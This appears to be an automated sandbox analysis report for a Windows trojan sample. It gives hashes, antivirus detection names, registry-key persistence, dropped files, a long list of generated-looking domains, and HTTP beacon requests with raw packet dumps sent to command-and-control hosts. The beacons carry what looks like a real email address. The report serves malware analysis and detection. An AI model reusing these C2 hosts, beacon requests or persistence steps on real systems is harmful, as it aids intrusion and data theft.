Analysis Date2015-08-27 10:23:06
MD571dd4acc4a1ca2755de4c93bd88e4458
SHA1f6b3521206b4fa755c2c06dfebd01a66c9f12baa

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 563e2bcad0adcf8e811743c7bf836324 sha1: b6591be8752294105988fab4b06f0392fa44e4ae size: 303104
Section.rdata md5: a1bfcc063e34b20570ecebf4aadc8ea9 sha1: 0323c565f34d331157610d3cc59a56e3072c645c size: 34304
Section.data md5: e90e9bc02ef8cfab0a58245fcd71f1fc sha1: acd103891afcee40fdfd6ba6c0386115e11a4860 size: 99328
Timestamp2015-01-29 10:21:39
PackerMicrosoft Visual C++ ?.?
PEhash2898c195e0acb9f3549777c90eb7780927d69018
IMPhashd4e563ea85ff6315f4e7724bce630fd2
AVRisingno_virus
AVMcafeeTrojan-FEMT!71DD4ACC4A1C
AVAvira (antivir)TR/ATRAPS.Gen2
AVTwisterTrojan.Agent.VNC.aanx.mg
AVAd-AwareGen:Variant.Symmi.22722
AVAlwil (avast)Malware-gen:Win32:Malware-gen
AVEset (nod32)Win32/Agent.VNC
AVGrisoft (avg)Win32/Cryptor
AVSymantecDownloader.Upatre!g15
AVFortinetW32/Agent.VNC!tr
AVBitDefenderGen:Variant.Symmi.22722
AVK7Trojan ( 004cb2771 )
AVMicrosoft Security EssentialsTrojanSpy:Win32/Nivdort.Z
AVMicroWorld (escan)Gen:Variant.Symmi.22722
AVMalwareBytesTrojan.Zbot.WHE
AVAuthentiumW32/Wonton.B.gen!Eldorado
AVFrisk (f-prot)no_virus
AVIkarusno_virus
AVEmsisoftGen:Variant.Symmi.22722
AVZillya!no_virus
AVKasperskyTrojan.Win32.Generic
AVTrend MicroTSPY_NIVDORT.SMB
AVCAT (quickheal)Trojan.Dynamer.AC3
AVVirusBlokAda (vba32)no_virus
AVPadvishno_virus
AVBullGuardGen:Variant.Symmi.22722
AVArcabit (arcavir)Gen:Variant.Symmi.22722
AVClamAVno_virus
AVDr. WebTrojan.DownLoader15.48275
AVF-SecureGen:Variant.Symmi.22722
AVCA (E-Trust Ino)no_virus

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\AutoConnect Link Source Enumerator Diagnostic ➝
C:\Documents and Settings\Administrator\Application Data\gszjxycbyvxzal\enebdwd.exe
Creates FileC:\Documents and Settings\Administrator\Application Data\gszjxycbyvxzal\enebdwd.exe
Creates ProcessC:\Documents and Settings\Administrator\Application Data\gszjxycbyvxzal\enebdwd.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\gszjxycbyvxzal\enebdwd.exe

Creates FileC:\Documents and Settings\Administrator\Application Data\gszjxycbyvxzal\enebdwd.xk
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Application Data\gszjxycbyvxzal\mbcdkzsaed.exe
Creates ProcessWATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\gszjxycbyvxzal\enebdwd.exe"

Process
↳ WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\gszjxycbyvxzal\enebdwd.exe"

Network Details:

DNSfinishperiod.net
Type: A
50.63.202.32
DNSseveradifference.net
Type: A
95.211.230.75
DNSsimpledifference.net
Type: A
31.22.4.18
DNSwindowchoose.net
Type: A
DNSperhapsalthough.net
Type: A
DNSwindowalthough.net
Type: A
DNSperhapsperiod.net
Type: A
DNSwindowperiod.net
Type: A
DNSperhapshowever.net
Type: A
DNSwindowhowever.net
Type: A
DNSwinterchoose.net
Type: A
DNSsubjectchoose.net
Type: A
DNSwinteralthough.net
Type: A
DNSsubjectalthough.net
Type: A
DNSwinterperiod.net
Type: A
DNSsubjectperiod.net
Type: A
DNSwinterhowever.net
Type: A
DNSsubjecthowever.net
Type: A
DNSfinishchoose.net
Type: A
DNSleavechoose.net
Type: A
DNSfinishalthough.net
Type: A
DNSleavealthough.net
Type: A
DNSleaveperiod.net
Type: A
DNSfinishhowever.net
Type: A
DNSleavehowever.net
Type: A
DNSsweetchoose.net
Type: A
DNSprobablychoose.net
Type: A
DNSsweetalthough.net
Type: A
DNSprobablyalthough.net
Type: A
DNSsweetperiod.net
Type: A
DNSprobablyperiod.net
Type: A
DNSsweethowever.net
Type: A
DNSprobablyhowever.net
Type: A
DNSseveralchoose.net
Type: A
DNSmaterialchoose.net
Type: A
DNSseveralalthough.net
Type: A
DNSmaterialalthough.net
Type: A
DNSseveralperiod.net
Type: A
DNSmaterialperiod.net
Type: A
DNSseveralhowever.net
Type: A
DNSmaterialhowever.net
Type: A
DNSseverasingle.net
Type: A
DNSlaughsingle.net
Type: A
DNSseveracharge.net
Type: A
DNSlaughcharge.net
Type: A
DNSlaughdifference.net
Type: A
DNSseveraevery.net
Type: A
DNSlaughevery.net
Type: A
DNSsimplesingle.net
Type: A
DNSmothersingle.net
Type: A
DNSsimplecharge.net
Type: A
DNSmothercharge.net
Type: A
DNSmotherdifference.net
Type: A
DNSsimpleevery.net
Type: A
DNSmotherevery.net
Type: A
DNSmountainsingle.net
Type: A
DNSpossiblesingle.net
Type: A
DNSmountaincharge.net
Type: A
DNSpossiblecharge.net
Type: A
DNSmountaindifference.net
Type: A
DNSpossibledifference.net
Type: A
DNSmountainevery.net
Type: A
DNSpossibleevery.net
Type: A
DNSperhapssingle.net
Type: A
DNSwindowsingle.net
Type: A
DNSperhapscharge.net
Type: A
DNSwindowcharge.net
Type: A
DNSperhapsdifference.net
Type: A
DNSwindowdifference.net
Type: A
DNSperhapsevery.net
Type: A
DNSwindowevery.net
Type: A
DNSwintersingle.net
Type: A
DNSsubjectsingle.net
Type: A
DNSwintercharge.net
Type: A
DNSsubjectcharge.net
Type: A
DNSwinterdifference.net
Type: A
DNSsubjectdifference.net
Type: A
DNSwinterevery.net
Type: A
DNSsubjectevery.net
Type: A
DNSfinishsingle.net
Type: A
DNSleavesingle.net
Type: A
DNSfinishcharge.net
Type: A
DNSleavecharge.net
Type: A
DNSfinishdifference.net
Type: A
DNSleavedifference.net
Type: A
HTTP GEThttp://finishperiod.net/index.php?email=backoffice@confidentinvest.ro&method=post&len
User-Agent:
HTTP GEThttp://severadifference.net/index.php?email=backoffice@confidentinvest.ro&method=post&len
User-Agent:
HTTP GEThttp://simpledifference.net/index.php?email=backoffice@confidentinvest.ro&method=post&len
User-Agent:
Flows TCP192.168.1.1:1031 ➝ 50.63.202.32:80
Flows TCP192.168.1.1:1032 ➝ 95.211.230.75:80
Flows TCP192.168.1.1:1033 ➝ 31.22.4.18:80

Raw Pcap
0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d626163 6b6f6666 69636540   mail=backoffice@
0x00000020 (00032)   636f6e66 6964656e 74696e76 6573742e   confidentinvest.
0x00000030 (00048)   726f266d 6574686f 643d706f 7374266c   ro&method=post&l
0x00000040 (00064)   656e2048 5454502f 312e300d 0a416363   en HTTP/1.0..Acc
0x00000050 (00080)   6570743a 202a2f2a 0d0a436f 6e6e6563   ept: */*..Connec
0x00000060 (00096)   74696f6e 3a20636c 6f73650d 0a486f73   tion: close..Hos
0x00000070 (00112)   743a2066 696e6973 68706572 696f642e   t: finishperiod.
0x00000080 (00128)   6e65740d 0a0d0a                       net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d626163 6b6f6666 69636540   mail=backoffice@
0x00000020 (00032)   636f6e66 6964656e 74696e76 6573742e   confidentinvest.
0x00000030 (00048)   726f266d 6574686f 643d706f 7374266c   ro&method=post&l
0x00000040 (00064)   656e2048 5454502f 312e300d 0a416363   en HTTP/1.0..Acc
0x00000050 (00080)   6570743a 202a2f2a 0d0a436f 6e6e6563   ept: */*..Connec
0x00000060 (00096)   74696f6e 3a20636c 6f73650d 0a486f73   tion: close..Hos
0x00000070 (00112)   743a2073 65766572 61646966 66657265   t: severadiffere
0x00000080 (00128)   6e63652e 6e65740d 0a0d0a              nce.net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d626163 6b6f6666 69636540   mail=backoffice@
0x00000020 (00032)   636f6e66 6964656e 74696e76 6573742e   confidentinvest.
0x00000030 (00048)   726f266d 6574686f 643d706f 7374266c   ro&method=post&l
0x00000040 (00064)   656e2048 5454502f 312e300d 0a416363   en HTTP/1.0..Acc
0x00000050 (00080)   6570743a 202a2f2a 0d0a436f 6e6e6563   ept: */*..Connec
0x00000060 (00096)   74696f6e 3a20636c 6f73650d 0a486f73   tion: close..Hos
0x00000070 (00112)   743a2073 696d706c 65646966 66657265   t: simplediffere
0x00000080 (00128)   6e63652e 6e65740d 0a0d0a              nce.net....


Strings